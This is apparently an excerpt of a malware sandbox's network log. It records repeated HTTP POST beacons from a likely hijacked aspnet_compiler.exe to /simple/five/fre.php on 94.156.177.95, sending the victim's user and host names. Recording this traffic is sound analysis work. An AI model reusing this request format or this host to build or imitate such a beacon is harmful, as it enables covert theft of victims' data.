                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:25.761615992 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:25 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                51192.168.2.44990094.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:26.045871019 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:26.050868034 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:27.028803110 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:26 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                52192.168.2.44990594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:27.202425957 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:27.207350969 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:28.160433054 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:28 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                53192.168.2.44991194.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:28.323595047 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:28.328660965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:29.272986889 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:29 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                54192.168.2.44991894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:29.439150095 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:29.444036007 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:30.400077105 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:30 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                55192.168.2.44992394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:30.553162098 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:30.558346033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:32.028471947 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:31 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                56192.168.2.44993294.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:32.180358887 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:32.185276031 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:33.186584949 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:33 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                57192.168.2.44993694.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:33.338016033 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:33.342989922 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:34.312840939 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:34 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                58192.168.2.44994294.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:34.456140995 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:34.461021900 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:35.454488039 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:35 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                59192.168.2.44994994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:35.601607084 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:35.606842041 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:36.557085037 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:36 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                60192.168.2.44995694.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:36.934304953 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:36.942826986 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:37.889698029 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:37 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                61192.168.2.44996594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:38.035571098 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:38.040555954 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:39.001919985 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:38 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                62192.168.2.44997194.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:39.154721022 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:39.160355091 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:40.095613956 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:39 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                63192.168.2.44997894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:40.252780914 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:40.257744074 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:41.246045113 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:41 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                64192.168.2.44998594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:41.397134066 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:41.402378082 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:42.357958078 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:42 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                65192.168.2.44999194.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:42.519032001 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:42.524039984 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:43.495873928 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:43 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                66192.168.2.44999894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:43.643137932 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:43.648108959 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:44.607532978 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:44 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                67192.168.2.45000394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:44.753181934 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:44.761342049 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
